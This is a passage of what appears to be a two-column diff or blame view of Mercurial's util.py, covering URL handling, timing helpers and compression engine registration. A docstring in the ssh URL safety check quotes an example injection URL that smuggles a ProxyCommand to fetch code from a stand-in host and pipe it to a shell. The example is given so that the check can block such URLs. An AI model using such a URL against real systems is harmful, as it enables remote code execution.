2958 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2950 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2959 'http://user:pw@host:80/?foo=bar&baz=42'
2951 'http://user:pw@host:80/?foo=bar&baz=42'
2960 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2952 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2961 'http://user:pw@host:80/?foo=bar%3dbaz'
2953 'http://user:pw@host:80/?foo=bar%3dbaz'
2962 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2954 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2963 'ssh://user:pw@[::1]:2200//home/joe#'
2955 'ssh://user:pw@[::1]:2200//home/joe#'
2964 >>> bytes(url(b'http://localhost:80//'))
2956 >>> bytes(url(b'http://localhost:80//'))
2965 'http://localhost:80//'
2957 'http://localhost:80//'
2966 >>> bytes(url(b'http://localhost:80/'))
2958 >>> bytes(url(b'http://localhost:80/'))
2967 'http://localhost:80/'
2959 'http://localhost:80/'
2968 >>> bytes(url(b'http://localhost:80'))
2960 >>> bytes(url(b'http://localhost:80'))
2969 'http://localhost:80/'
2961 'http://localhost:80/'
2970 >>> bytes(url(b'bundle:foo'))
2962 >>> bytes(url(b'bundle:foo'))
2971 'bundle:foo'
2963 'bundle:foo'
2972 >>> bytes(url(b'bundle://../foo'))
2964 >>> bytes(url(b'bundle://../foo'))
2973 'bundle:../foo'
2965 'bundle:../foo'
2974 >>> bytes(url(b'path'))
2966 >>> bytes(url(b'path'))
2975 'path'
2967 'path'
2976 >>> bytes(url(b'file:///tmp/foo/bar'))
2968 >>> bytes(url(b'file:///tmp/foo/bar'))
2977 'file:///tmp/foo/bar'
2969 'file:///tmp/foo/bar'
2978 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2970 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2979 'file:///c:/tmp/foo/bar'
2971 'file:///c:/tmp/foo/bar'
2980 >>> print(url(br'bundle:foo\bar'))
2972 >>> print(url(br'bundle:foo\bar'))
2981 bundle:foo\bar
2973 bundle:foo\bar
2982 >>> print(url(br'file:///D:\data\hg'))
2974 >>> print(url(br'file:///D:\data\hg'))
2983 file:///D:\data\hg
2975 file:///D:\data\hg
2984 """
2976 """
2985 if self._localpath:
2977 if self._localpath:
2986 s = self.path
2978 s = self.path
2987 if self.scheme == 'bundle':
2979 if self.scheme == 'bundle':
2988 s = 'bundle:' + s
2980 s = 'bundle:' + s
2989 if self.fragment:
2981 if self.fragment:
2990 s += '#' + self.fragment
2982 s += '#' + self.fragment
2991 return s
2983 return s
2992
2984
2993 s = self.scheme + ':'
2985 s = self.scheme + ':'
2994 if self.user or self.passwd or self.host:
2986 if self.user or self.passwd or self.host:
2995 s += '//'
2987 s += '//'
2996 elif self.scheme and (not self.path or self.path.startswith('/')
2988 elif self.scheme and (not self.path or self.path.startswith('/')
2997 or hasdriveletter(self.path)):
2989 or hasdriveletter(self.path)):
2998 s += '//'
2990 s += '//'
2999 if hasdriveletter(self.path):
2991 if hasdriveletter(self.path):
3000 s += '/'
2992 s += '/'
3001 if self.user:
2993 if self.user:
3002 s += urlreq.quote(self.user, safe=self._safechars)
2994 s += urlreq.quote(self.user, safe=self._safechars)
3003 if self.passwd:
2995 if self.passwd:
3004 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2996 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
3005 if self.user or self.passwd:
2997 if self.user or self.passwd:
3006 s += '@'
2998 s += '@'
3007 if self.host:
2999 if self.host:
3008 if not (self.host.startswith('[') and self.host.endswith(']')):
3000 if not (self.host.startswith('[') and self.host.endswith(']')):
3009 s += urlreq.quote(self.host)
3001 s += urlreq.quote(self.host)
3010 else:
3002 else:
3011 s += self.host
3003 s += self.host
3012 if self.port:
3004 if self.port:
3013 s += ':' + urlreq.quote(self.port)
3005 s += ':' + urlreq.quote(self.port)
3014 if self.host:
3006 if self.host:
3015 s += '/'
3007 s += '/'
3016 if self.path:
3008 if self.path:
3017 # TODO: similar to the query string, we should not unescape the
3009 # TODO: similar to the query string, we should not unescape the
3018 # path when we store it, the path might contain '%2f' = '/',
3010 # path when we store it, the path might contain '%2f' = '/',
3019 # which we should *not* escape.
3011 # which we should *not* escape.
3020 s += urlreq.quote(self.path, safe=self._safepchars)
3012 s += urlreq.quote(self.path, safe=self._safepchars)
3021 if self.query:
3013 if self.query:
3022 # we store the query in escaped form.
3014 # we store the query in escaped form.
3023 s += '?' + self.query
3015 s += '?' + self.query
3024 if self.fragment is not None:
3016 if self.fragment is not None:
3025 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3017 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3026 return s
3018 return s
3027
3019
3028 __str__ = encoding.strmethod(__bytes__)
3020 __str__ = encoding.strmethod(__bytes__)
3029
3021
3030 def authinfo(self):
3022 def authinfo(self):
3031 user, passwd = self.user, self.passwd
3023 user, passwd = self.user, self.passwd
3032 try:
3024 try:
3033 self.user, self.passwd = None, None
3025 self.user, self.passwd = None, None
3034 s = bytes(self)
3026 s = bytes(self)
3035 finally:
3027 finally:
3036 self.user, self.passwd = user, passwd
3028 self.user, self.passwd = user, passwd
3037 if not self.user:
3029 if not self.user:
3038 return (s, None)
3030 return (s, None)
3039 # authinfo[1] is passed to urllib2 password manager, and its
3031 # authinfo[1] is passed to urllib2 password manager, and its
3040 # URIs must not contain credentials. The host is passed in the
3032 # URIs must not contain credentials. The host is passed in the
3041 # URIs list because Python < 2.4.3 uses only that to search for
3033 # URIs list because Python < 2.4.3 uses only that to search for
3042 # a password.
3034 # a password.
3043 return (s, (None, (s, self.host),
3035 return (s, (None, (s, self.host),
3044 self.user, self.passwd or ''))
3036 self.user, self.passwd or ''))
3045
3037
3046 def isabs(self):
3038 def isabs(self):
3047 if self.scheme and self.scheme != 'file':
3039 if self.scheme and self.scheme != 'file':
3048 return True # remote URL
3040 return True # remote URL
3049 if hasdriveletter(self.path):
3041 if hasdriveletter(self.path):
3050 return True # absolute for our purposes - can't be joined()
3042 return True # absolute for our purposes - can't be joined()
3051 if self.path.startswith(br'\\'):
3043 if self.path.startswith(br'\\'):
3052 return True # Windows UNC path
3044 return True # Windows UNC path
3053 if self.path.startswith('/'):
3045 if self.path.startswith('/'):
3054 return True # POSIX-style
3046 return True # POSIX-style
3055 return False
3047 return False
3056
3048
3057 def localpath(self):
3049 def localpath(self):
3058 if self.scheme == 'file' or self.scheme == 'bundle':
3050 if self.scheme == 'file' or self.scheme == 'bundle':
3059 path = self.path or '/'
3051 path = self.path or '/'
3060 # For Windows, we need to promote hosts containing drive
3052 # For Windows, we need to promote hosts containing drive
3061 # letters to paths with drive letters.
3053 # letters to paths with drive letters.
3062 if hasdriveletter(self._hostport):
3054 if hasdriveletter(self._hostport):
3063 path = self._hostport + '/' + self.path
3055 path = self._hostport + '/' + self.path
3064 elif (self.host is not None and self.path
3056 elif (self.host is not None and self.path
3065 and not hasdriveletter(path)):
3057 and not hasdriveletter(path)):
3066 path = '/' + path
3058 path = '/' + path
3067 return path
3059 return path
3068 return self._origpath
3060 return self._origpath
3069
3061
3070 def islocal(self):
3062 def islocal(self):
3071 '''whether localpath will return something that posixfile can open'''
3063 '''whether localpath will return something that posixfile can open'''
3072 return (not self.scheme or self.scheme == 'file'
3064 return (not self.scheme or self.scheme == 'file'
3073 or self.scheme == 'bundle')
3065 or self.scheme == 'bundle')
3074
3066
3075 def hasscheme(path):
3067 def hasscheme(path):
3076 return bool(url(path).scheme)
3068 return bool(url(path).scheme)
3077
3069
3078 def hasdriveletter(path):
3070 def hasdriveletter(path):
3079 return path and path[1:2] == ':' and path[0:1].isalpha()
3071 return path and path[1:2] == ':' and path[0:1].isalpha()
3080
3072
3081 def urllocalpath(path):
3073 def urllocalpath(path):
3082 return url(path, parsequery=False, parsefragment=False).localpath()
3074 return url(path, parsequery=False, parsefragment=False).localpath()
3083
3075
3084 def checksafessh(path):
3076 def checksafessh(path):
3085 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3077 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3086
3078
3087 This is a sanity check for ssh urls. ssh will parse the first item as
3079 This is a sanity check for ssh urls. ssh will parse the first item as
3088 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3080 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3089 Let's prevent these potentially exploited urls entirely and warn the
3081 Let's prevent these potentially exploited urls entirely and warn the
3090 user.
3082 user.
3091
3083
3092 Raises an error.Abort when the url is unsafe.
3084 Raises an error.Abort when the url is unsafe.
3093 """
3085 """
3094 path = urlreq.unquote(path)
3086 path = urlreq.unquote(path)
3095 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3087 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3096 raise error.Abort(_('potentially unsafe url: %r') %
3088 raise error.Abort(_('potentially unsafe url: %r') %
3097 (pycompat.bytestr(path),))
3089 (pycompat.bytestr(path),))
3098
3090
3099 def hidepassword(u):
3091 def hidepassword(u):
3100 '''hide user credential in a url string'''
3092 '''hide user credential in a url string'''
3101 u = url(u)
3093 u = url(u)
3102 if u.passwd:
3094 if u.passwd:
3103 u.passwd = '***'
3095 u.passwd = '***'
3104 return bytes(u)
3096 return bytes(u)
3105
3097
3106 def removeauth(u):
3098 def removeauth(u):
3107 '''remove all authentication information from a url string'''
3099 '''remove all authentication information from a url string'''
3108 u = url(u)
3100 u = url(u)
3109 u.user = u.passwd = None
3101 u.user = u.passwd = None
3110 return str(u)
3102 return str(u)
3111
3103
3112 timecount = unitcountfn(
3104 timecount = unitcountfn(
3113 (1, 1e3, _('%.0f s')),
3105 (1, 1e3, _('%.0f s')),
3114 (100, 1, _('%.1f s')),
3106 (100, 1, _('%.1f s')),
3115 (10, 1, _('%.2f s')),
3107 (10, 1, _('%.2f s')),
3116 (1, 1, _('%.3f s')),
3108 (1, 1, _('%.3f s')),
3117 (100, 0.001, _('%.1f ms')),
3109 (100, 0.001, _('%.1f ms')),
3118 (10, 0.001, _('%.2f ms')),
3110 (10, 0.001, _('%.2f ms')),
3119 (1, 0.001, _('%.3f ms')),
3111 (1, 0.001, _('%.3f ms')),
3120 (100, 0.000001, _('%.1f us')),
3112 (100, 0.000001, _('%.1f us')),
3121 (10, 0.000001, _('%.2f us')),
3113 (10, 0.000001, _('%.2f us')),
3122 (1, 0.000001, _('%.3f us')),
3114 (1, 0.000001, _('%.3f us')),
3123 (100, 0.000000001, _('%.1f ns')),
3115 (100, 0.000000001, _('%.1f ns')),
3124 (10, 0.000000001, _('%.2f ns')),
3116 (10, 0.000000001, _('%.2f ns')),
3125 (1, 0.000000001, _('%.3f ns')),
3117 (1, 0.000000001, _('%.3f ns')),
3126 )
3118 )
3127
3119
3128 _timenesting = [0]
3120 _timenesting = [0]
3129
3121
3130 def timed(func):
3122 def timed(func):
3131 '''Report the execution time of a function call to stderr.
3123 '''Report the execution time of a function call to stderr.
3132
3124
3133 During development, use as a decorator when you need to measure
3125 During development, use as a decorator when you need to measure
3134 the cost of a function, e.g. as follows:
3126 the cost of a function, e.g. as follows:
3135
3127
3136 @util.timed
3128 @util.timed
3137 def foo(a, b, c):
3129 def foo(a, b, c):
3138 pass
3130 pass
3139 '''
3131 '''
3140
3132
3141 def wrapper(*args, **kwargs):
3133 def wrapper(*args, **kwargs):
3142 start = timer()
3134 start = timer()
3143 indent = 2
3135 indent = 2
3144 _timenesting[0] += indent
3136 _timenesting[0] += indent
3145 try:
3137 try:
3146 return func(*args, **kwargs)
3138 return func(*args, **kwargs)
3147 finally:
3139 finally:
3148 elapsed = timer() - start
3140 elapsed = timer() - start
3149 _timenesting[0] -= indent
3141 _timenesting[0] -= indent
3150 stderr.write('%s%s: %s\n' %
3142 stderr.write('%s%s: %s\n' %
3151 (' ' * _timenesting[0], func.__name__,
3143 (' ' * _timenesting[0], func.__name__,
3152 timecount(elapsed)))
3144 timecount(elapsed)))
3153 return wrapper
3145 return wrapper
3154
3146
3155 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3147 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3156 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3148 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3157
3149
3158 def sizetoint(s):
3150 def sizetoint(s):
3159 '''Convert a space specifier to a byte count.
3151 '''Convert a space specifier to a byte count.
3160
3152
3161 >>> sizetoint(b'30')
3153 >>> sizetoint(b'30')
3162 30
3154 30
3163 >>> sizetoint(b'2.2kb')
3155 >>> sizetoint(b'2.2kb')
3164 2252
3156 2252
3165 >>> sizetoint(b'6M')
3157 >>> sizetoint(b'6M')
3166 6291456
3158 6291456
3167 '''
3159 '''
3168 t = s.strip().lower()
3160 t = s.strip().lower()
3169 try:
3161 try:
3170 for k, u in _sizeunits:
3162 for k, u in _sizeunits:
3171 if t.endswith(k):
3163 if t.endswith(k):
3172 return int(float(t[:-len(k)]) * u)
3164 return int(float(t[:-len(k)]) * u)
3173 return int(t)
3165 return int(t)
3174 except ValueError:
3166 except ValueError:
3175 raise error.ParseError(_("couldn't parse size: %s") % s)
3167 raise error.ParseError(_("couldn't parse size: %s") % s)
3176
3168
3177 class hooks(object):
3169 class hooks(object):
3178 '''A collection of hook functions that can be used to extend a
3170 '''A collection of hook functions that can be used to extend a
3179 function's behavior. Hooks are called in lexicographic order,
3171 function's behavior. Hooks are called in lexicographic order,
3180 based on the names of their sources.'''
3172 based on the names of their sources.'''
3181
3173
3182 def __init__(self):
3174 def __init__(self):
3183 self._hooks = []
3175 self._hooks = []
3184
3176
3185 def add(self, source, hook):
3177 def add(self, source, hook):
3186 self._hooks.append((source, hook))
3178 self._hooks.append((source, hook))
3187
3179
3188 def __call__(self, *args):
3180 def __call__(self, *args):
3189 self._hooks.sort(key=lambda x: x[0])
3181 self._hooks.sort(key=lambda x: x[0])
3190 results = []
3182 results = []
3191 for source, hook in self._hooks:
3183 for source, hook in self._hooks:
3192 results.append(hook(*args))
3184 results.append(hook(*args))
3193 return results
3185 return results
3194
3186
3195 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3187 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3196 '''Yields lines for a nicely formatted stacktrace.
3188 '''Yields lines for a nicely formatted stacktrace.
3197 Skips the 'skip' last entries, then return the last 'depth' entries.
3189 Skips the 'skip' last entries, then return the last 'depth' entries.
3198 Each file+linenumber is formatted according to fileline.
3190 Each file+linenumber is formatted according to fileline.
3199 Each line is formatted according to line.
3191 Each line is formatted according to line.
3200 If line is None, it yields:
3192 If line is None, it yields:
3201 length of longest filepath+line number,
3193 length of longest filepath+line number,
3202 filepath+linenumber,
3194 filepath+linenumber,
3203 function
3195 function
3204
3196
3205 Not be used in production code but very convenient while developing.
3197 Not be used in production code but very convenient while developing.
3206 '''
3198 '''
3207 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3199 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3208 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3200 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3209 ][-depth:]
3201 ][-depth:]
3210 if entries:
3202 if entries:
3211 fnmax = max(len(entry[0]) for entry in entries)
3203 fnmax = max(len(entry[0]) for entry in entries)
3212 for fnln, func in entries:
3204 for fnln, func in entries:
3213 if line is None:
3205 if line is None:
3214 yield (fnmax, fnln, func)
3206 yield (fnmax, fnln, func)
3215 else:
3207 else:
3216 yield line % (fnmax, fnln, func)
3208 yield line % (fnmax, fnln, func)
3217
3209
3218 def debugstacktrace(msg='stacktrace', skip=0,
3210 def debugstacktrace(msg='stacktrace', skip=0,
3219 f=stderr, otherf=stdout, depth=0):
3211 f=stderr, otherf=stdout, depth=0):
3220 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3212 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3221 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3213 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3222 By default it will flush stdout first.
3214 By default it will flush stdout first.
3223 It can be used everywhere and intentionally does not require an ui object.
3215 It can be used everywhere and intentionally does not require an ui object.
3224 Not be used in production code but very convenient while developing.
3216 Not be used in production code but very convenient while developing.
3225 '''
3217 '''
3226 if otherf:
3218 if otherf:
3227 otherf.flush()
3219 otherf.flush()
3228 f.write('%s at:\n' % msg.rstrip())
3220 f.write('%s at:\n' % msg.rstrip())
3229 for line in getstackframes(skip + 1, depth=depth):
3221 for line in getstackframes(skip + 1, depth=depth):
3230 f.write(line)
3222 f.write(line)
3231 f.flush()
3223 f.flush()
3232
3224
3233 class dirs(object):
3225 class dirs(object):
3234 '''a multiset of directory names from a dirstate or manifest'''
3226 '''a multiset of directory names from a dirstate or manifest'''
3235
3227
3236 def __init__(self, map, skip=None):
3228 def __init__(self, map, skip=None):
3237 self._dirs = {}
3229 self._dirs = {}
3238 addpath = self.addpath
3230 addpath = self.addpath
3239 if safehasattr(map, 'iteritems') and skip is not None:
3231 if safehasattr(map, 'iteritems') and skip is not None:
3240 for f, s in map.iteritems():
3232 for f, s in map.iteritems():
3241 if s[0] != skip:
3233 if s[0] != skip:
3242 addpath(f)
3234 addpath(f)
3243 else:
3235 else:
3244 for f in map:
3236 for f in map:
3245 addpath(f)
3237 addpath(f)
3246
3238
3247 def addpath(self, path):
3239 def addpath(self, path):
3248 dirs = self._dirs
3240 dirs = self._dirs
3249 for base in finddirs(path):
3241 for base in finddirs(path):
3250 if base in dirs:
3242 if base in dirs:
3251 dirs[base] += 1
3243 dirs[base] += 1
3252 return
3244 return
3253 dirs[base] = 1
3245 dirs[base] = 1
3254
3246
3255 def delpath(self, path):
3247 def delpath(self, path):
3256 dirs = self._dirs
3248 dirs = self._dirs
3257 for base in finddirs(path):
3249 for base in finddirs(path):
3258 if dirs[base] > 1:
3250 if dirs[base] > 1:
3259 dirs[base] -= 1
3251 dirs[base] -= 1
3260 return
3252 return
3261 del dirs[base]
3253 del dirs[base]
3262
3254
3263 def __iter__(self):
3255 def __iter__(self):
3264 return iter(self._dirs)
3256 return iter(self._dirs)
3265
3257
3266 def __contains__(self, d):
3258 def __contains__(self, d):
3267 return d in self._dirs
3259 return d in self._dirs
3268
3260
3269 if safehasattr(parsers, 'dirs'):
3261 if safehasattr(parsers, 'dirs'):
3270 dirs = parsers.dirs
3262 dirs = parsers.dirs
3271
3263
3272 def finddirs(path):
3264 def finddirs(path):
3273 pos = path.rfind('/')
3265 pos = path.rfind('/')
3274 while pos != -1:
3266 while pos != -1:
3275 yield path[:pos]
3267 yield path[:pos]
3276 pos = path.rfind('/', 0, pos)
3268 pos = path.rfind('/', 0, pos)
3277
3269
3278 # compression code
3270 # compression code
3279
3271
3280 SERVERROLE = 'server'
3272 SERVERROLE = 'server'
3281 CLIENTROLE = 'client'
3273 CLIENTROLE = 'client'
3282
3274
3283 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3275 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3284 (u'name', u'serverpriority',
3276 (u'name', u'serverpriority',
3285 u'clientpriority'))
3277 u'clientpriority'))
3286
3278
3287 class compressormanager(object):
3279 class compressormanager(object):
3288 """Holds registrations of various compression engines.
3280 """Holds registrations of various compression engines.
3289
3281
3290 This class essentially abstracts the differences between compression
3282 This class essentially abstracts the differences between compression
3291 engines to allow new compression formats to be added easily, possibly from
3283 engines to allow new compression formats to be added easily, possibly from
3292 extensions.
3284 extensions.
3293
3285
3294 Compressors are registered against the global instance by calling its
3286 Compressors are registered against the global instance by calling its
3295 ``register()`` method.
3287 ``register()`` method.
3296 """
3288 """
3297 def __init__(self):
3289 def __init__(self):
3298 self._engines = {}
3290 self._engines = {}
3299 # Bundle spec human name to engine name.
3291 # Bundle spec human name to engine name.
3300 self._bundlenames = {}
3292 self._bundlenames = {}
3301 # Internal bundle identifier to engine name.
3293 # Internal bundle identifier to engine name.
3302 self._bundletypes = {}
3294 self._bundletypes = {}
3303 # Revlog header to engine name.
3295 # Revlog header to engine name.
3304 self._revlogheaders = {}
3296 self._revlogheaders = {}
3305 # Wire proto identifier to engine name.
3297 # Wire proto identifier to engine name.
3306 self._wiretypes = {}
3298 self._wiretypes = {}
3307
3299
3308 def __getitem__(self, key):
3300 def __getitem__(self, key):
3309 return self._engines[key]
3301 return self._engines[key]
3310
3302
3311 def __contains__(self, key):
3303 def __contains__(self, key):
3312 return key in self._engines
3304 return key in self._engines
3313
3305
3314 def __iter__(self):
3306 def __iter__(self):
3315 return iter(self._engines.keys())
3307 return iter(self._engines.keys())
3316
3308
3317 def register(self, engine):
3309 def register(self, engine):
3318 """Register a compression engine with the manager.
3310 """Register a compression engine with the manager.
3319
3311
3320 The argument must be a ``compressionengine`` instance.
3312 The argument must be a ``compressionengine`` instance.
3321 """
3313 """
3322 if not isinstance(engine, compressionengine):
3314 if not isinstance(engine, compressionengine):
3323 raise ValueError(_('argument must be a compressionengine'))
3315 raise ValueError(_('argument must be a compressionengine'))
3324
3316
3325 name = engine.name()
3317 name = engine.name()
3326
3318
3327 if name in self._engines:
3319 if name in self._engines:
3328 raise error.Abort(_('compression engine %s already registered') %
3320 raise error.Abort(_('compression engine %s already registered') %
3329 name)
3321 name)
3330
3322
3331 bundleinfo = engine.bundletype()
3323 bundleinfo = engine.bundletype()
3332 if bundleinfo:
3324 if bundleinfo:
3333 bundlename, bundletype = bundleinfo
3325 bundlename, bundletype = bundleinfo
3334
3326
3335 if bundlename in self._bundlenames:
3327 if bundlename in self._bundlenames:
3336 raise error.Abort(_('bundle name %s already registered') %
3328 raise error.Abort(_('bundle name %s already registered') %
3337 bundlename)
3329 bundlename)
3338 if bundletype in self._bundletypes:
3330 if bundletype in self._bundletypes:
3339 raise error.Abort(_('bundle type %s already registered by %s') %
3331 raise error.Abort(_('bundle type %s already registered by %s') %
3340 (bundletype, self._bundletypes[bundletype]))
3332 (bundletype, self._bundletypes[bundletype]))
3341
3333
3342 # No external facing name declared.
3334 # No external facing name declared.
3343 if bundlename:
3335 if bundlename:
3344 self._bundlenames[bundlename] = name
3336 self._bundlenames[bundlename] = name
3345
3337
3346 self._bundletypes[bundletype] = name
3338 self._bundletypes[bundletype] = name
3347
3339
3348 wiresupport = engine.wireprotosupport()
3340 wiresupport = engine.wireprotosupport()
3349 if wiresupport:
3341 if wiresupport:
3350 wiretype = wiresupport.name
3342 wiretype = wiresupport.name
3351 if wiretype in self._wiretypes:
3343 if wiretype in self._wiretypes:
3352 raise error.Abort(_('wire protocol compression %s already '
3344 raise error.Abort(_('wire protocol compression %s already '
3353 'registered by %s') %
3345 'registered by %s') %
3354 (wiretype, self._wiretypes[wiretype]))
3346 (wiretype, self._wiretypes[wiretype]))
3355
3347
3356 self._wiretypes[wiretype] = name
3348 self._wiretypes[wiretype] = name
3357
3349
3358 revlogheader = engine.revlogheader()
3350 revlogheader = engine.revlogheader()
3359 if revlogheader and revlogheader in self._revlogheaders:
3351 if revlogheader and revlogheader in self._revlogheaders:
3360 raise error.Abort(_('revlog header %s already registered by %s') %
3352 raise error.Abort(_('revlog header %s already registered by %s') %
3361 (revlogheader, self._revlogheaders[revlogheader]))
3353 (revlogheader, self._revlogheaders[revlogheader]))
3362
3354
3363 if revlogheader:
3355 if revlogheader:
3364 self._revlogheaders[revlogheader] = name
3356 self._revlogheaders[revlogheader] = name
3365
3357
3366 self._engines[name] = engine
3358 self._engines[name] = engine
3367
3359
3368 @property
3360 @property
3369 def supportedbundlenames(self):
3361 def supportedbundlenames(self):
3370 return set(self._bundlenames.keys())
3362 return set(self._bundlenames.keys())
3371
3363
3372 @property
3364 @property
3373 def supportedbundletypes(self):
3365 def supportedbundletypes(self):
3374 return set(self._bundletypes.keys())
3366 return set(self._bundletypes.keys())
3375
3367
3376 def forbundlename(self, bundlename):
3368 def forbundlename(self, bundlename):
3377 """Obtain a compression engine registered to a bundle name.
3369 """Obtain a compression engine registered to a bundle name.
3378
3370
3379 Will raise KeyError if the bundle type isn't registered.
3371 Will raise KeyError if the bundle type isn't registered.
3380
3372
3381 Will abort if the engine is known but not available.
3373 Will abort if the engine is known but not available.
3382 """
3374 """
3383 engine = self._engines[self._bundlenames[bundlename]]
3375 engine = self._engines[self._bundlenames[bundlename]]
3384 if not engine.available():
3376 if not engine.available():
3385 raise error.Abort(_('compression engine %s could not be loaded') %
3377 raise error.Abort(_('compression engine %s could not be loaded') %
3386 engine.name())
3378 engine.name())
3387 return engine
3379 return engine
3388
3380
3389 def forbundletype(self, bundletype):
3381 def forbundletype(self, bundletype):
3390 """Obtain a compression engine registered to a bundle type.
3382 """Obtain a compression engine registered to a bundle type.
3391
3383
3392 Will raise KeyError if the bundle type isn't registered.
3384 Will raise KeyError if the bundle type isn't registered.
3393
3385
3394 Will abort if the engine is known but not available.
3386 Will abort if the engine is known but not available.
3395 """
3387 """
3396 engine = self._engines[self._bundletypes[bundletype]]
3388 engine = self._engines[self._bundletypes[bundletype]]
3397 if not engine.available():
3389 if not engine.available():
3398 raise error.Abort(_('compression engine %s could not be loaded') %
3390 raise error.Abort(_('compression engine %s could not be loaded') %
3399 engine.name())
3391 engine.name())
3400 return engine
3392 return engine
3401
3393
3402 def supportedwireengines(self, role, onlyavailable=True):
3394 def supportedwireengines(self, role, onlyavailable=True):
3403 """Obtain compression engines that support the wire protocol.
3395 """Obtain compression engines that support the wire protocol.
3404
3396
3405 Returns a list of engines in prioritized order, most desired first.
3397 Returns a list of engines in prioritized order, most desired first.
3406
3398
3407 If ``onlyavailable`` is set, filter out engines that can't be
3399 If ``onlyavailable`` is set, filter out engines that can't be
3408 loaded.
3400 loaded.
3409 """
3401 """
3410 assert role in (SERVERROLE, CLIENTROLE)
3402 assert role in (SERVERROLE, CLIENTROLE)
3411
3403
3412 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3404 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3413
3405
3414 engines = [self._engines[e] for e in self._wiretypes.values()]
3406 engines = [self._engines[e] for e in self._wiretypes.values()]
3415 if onlyavailable:
3407 if onlyavailable:
3416 engines = [e for e in engines if e.available()]
3408 engines = [e for e in engines if e.available()]
3417
3409
3418 def getkey(e):
3410 def getkey(e):
3419 # Sort first by priority, highest first. In case of tie, sort
3411 # Sort first by priority, highest first. In case of tie, sort
3420 # alphabetically. This is arbitrary, but ensures output is
3412 # alphabetically. This is arbitrary, but ensures output is
3421 # stable.
3413 # stable.
3422 w = e.wireprotosupport()
3414 w = e.wireprotosupport()
3423 return -1 * getattr(w, attr), w.name
3415 return -1 * getattr(w, attr), w.name
3424
3416
3425 return list(sorted(engines, key=getkey))
3417 return list(sorted(engines, key=getkey))
3426
3418
3427 def forwiretype(self, wiretype):
3419 def forwiretype(self, wiretype):
3428 engine = self._engines[self._wiretypes[wiretype]]
3420 engine = self._engines[self._wiretypes[wiretype]]
3429 if not engine.available():
3421 if not engine.available():
3430 raise error.Abort(_('compression engine %s could not be loaded') %
3422 raise error.Abort(_('compression engine %s could not be loaded') %
3431 engine.name())
3423 engine.name())
3432 return engine
3424 return engine
3433
3425
3434 def forrevlogheader(self, header):
3426 def forrevlogheader(self, header):
3435 """Obtain a compression engine registered to a revlog header.
3427 """Obtain a compression engine registered to a revlog header.
3436
3428
3437 Will raise KeyError if the revlog header value isn't registered.
3429 Will raise KeyError if the revlog header value isn't registered.
3438 """
3430 """
3439 return self._engines[self._revlogheaders[header]]
3431 return self._engines[self._revlogheaders[header]]
3440
3432
3441 compengines = compressormanager()
3433 compengines = compressormanager()
3442
3434
3443 class compressionengine(object):
3435 class compressionengine(object):
3444 """Base class for compression engines.
3436 """Base class for compression engines.
3445
3437
3446 Compression engines must implement the interface defined by this class.
3438 Compression engines must implement the interface defined by this class.
3447 """
3439 """
3448 def name(self):
3440 def name(self):
3449 """Returns the name of the compression engine.
3441 """Returns the name of the compression engine.
3450
3442
3451 This is the key the engine is registered under.
3443 This is the key the engine is registered under.
3452
3444
3453 This method must be implemented.
3445 This method must be implemented.
3454 """
3446 """
3455 raise NotImplementedError()
3447 raise NotImplementedError()
3456
3448
3457 def available(self):
3449 def available(self):
3458 """Whether the compression engine is available.
3450 """Whether the compression engine is available.
3459
3451
3460 The intent of this method is to allow optional compression engines
3452 The intent of this method is to allow optional compression engines
3461 that may not be available in all installations (such as engines relying
3453 that may not be available in all installations (such as engines relying
3462 on C extensions that may not be present).
3454 on C extensions that may not be present).
3463 """
3455 """
3464 return True
3456 return True
3465
3457
3466 def bundletype(self):
3458 def bundletype(self):
3467 """Describes bundle identifiers for this engine.
3459 """Describes bundle identifiers for this engine.
3468
3460
3469 If this compression engine isn't supported for bundles, returns None.
3461 If this compression engine isn't supported for bundles, returns None.
3470
3462
3471 If this engine can be used for bundles, returns a 2-tuple of strings of
3463 If this engine can be used for bundles, returns a 2-tuple of strings of
3472 the user-facing "bundle spec" compression name and an internal
3464 the user-facing "bundle spec" compression name and an internal
3473 identifier used to denote the compression format within bundles. To
3465 identifier used to denote the compression format within bundles. To
3474 exclude the name from external usage, set the first element to ``None``.
3466 exclude the name from external usage, set the first element to ``None``.
3475
3467
3476 If bundle compression is supported, the class must also implement
3468 If bundle compression is supported, the class must also implement
3477 ``compressstream`` and `decompressorreader``.
3469 ``compressstream`` and `decompressorreader``.
3478
3470
3479 The docstring of this method is used in the help system to tell users
